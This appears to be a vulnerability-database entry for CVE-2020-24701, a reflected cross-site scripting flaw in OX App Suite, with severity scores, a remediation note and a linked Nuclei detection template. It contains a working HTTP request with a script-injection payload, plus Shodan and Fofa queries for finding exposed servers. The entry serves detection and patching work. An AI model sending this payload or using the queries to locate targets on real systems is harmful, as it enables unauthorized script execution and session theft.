| Title | OX Appsuite - Cross-Site Scripting |
|---|---|
| Author | DhiyaneshDk |
| Severity | Medium |
| Impact | Attackers can inject malicious JavaScript through the PATH_INFO parameter, potentially stealing session cookies or performing unauthorized actions on behalf of users. |
| Remediation | Upgrade to OX App Suite version 7.10.5 or later. |
| CVSS Score | 6.1 |
| EPSS Score | 0.40404 |
| CVE ID | CVE-2020-24701 |
| CWE ID | CWE-79 |
| Shodan Query | html:"Appsuite"http.html:"appsuite" |
| Fofa Query | body="appsuite" |
| Tags | cve cve2020 packetstorm seclists appsuite xss open-xchange vuln |
OX App Suite through 7.10.4 allows XSS via the app loading mechanism (the PATH_INFO to the /appsuite URI).
GET /ajax/apps/manifests?action=all&format=debug&xss=<script>alert(document.domain);</script> HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.5 Mobile/15E148 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-24701.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-24701.pcap
N/AN/A